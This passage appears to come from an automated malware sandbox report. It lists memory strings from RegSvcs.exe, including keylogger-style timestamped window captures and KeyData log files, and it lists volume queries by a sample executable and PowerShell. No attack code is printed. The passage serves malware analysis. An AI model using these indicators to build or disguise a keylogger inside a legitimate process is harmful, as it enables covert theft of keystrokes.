                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, KeyDataSSnjLnso.txt.12.drBinary or memory string: [17:14:20]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:26]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:41]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:57]<<Program Manager>>KeyD
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:55]<<Program Manager>>[
                    Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--57]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 17:14:55]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:28]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:06]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, KeyDataRbTCErLX.txt.12.drBinary or memory string: [17:14:44]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:00]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:40]<<Program Manager>>,
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDataFCXylbPs.txt.12.drBinary or memory string: [17:14:27]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD Tcpip [UDP/IP]13:34]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:52]<<Program Managerb
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:10]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:58Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:51]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:11<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDataWrlJLqwI.txt.12.drBinary or memory string: [17:14:37]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, KeyDatajPmvaPVG.txt.12.drBinary or memory string: [17:14:54]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :13:56]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:18]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:38Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:14:56]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:19]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:35]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:02]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\dons\7<
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3:21]<<Program Manager>>
                    Source: KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:15]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:48]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:14]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:47]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:26<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp, KeyDataIbAKZyhh.txt.12.drBinary or memory string: [17:14:24]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:53]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:57]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :14:05]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:16]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:47]..Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561065665.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:56]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:02]<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:26]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [7:14:55]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:06]<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:25]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :14:06]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:50]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:03]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, KeyDataZTfirKfY.txt.12.drBinary or memory string: [17:13:46]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, KeyDataIbAKZyhh.txt.12.dr, KeyDataSSnjLnso.txt.12.drBinary or memory string: [17:14:22]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:05]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:55]<<Program Manager>>:
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:57]<<Program Manager
                    Source: KeyDataSSnjLnso.txt.12.drBinary or memory string: [17:14:21]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:04]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:23]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:06]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:49]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\userager7
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 17:14:17]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\lfonsocument
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerxtxt:::te
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:58]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:13]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\d Manager
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:40]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:30]<<Program Manager>>
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeQueries volume information: C:\Users\user\Desktop\g44YQtTyjN.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
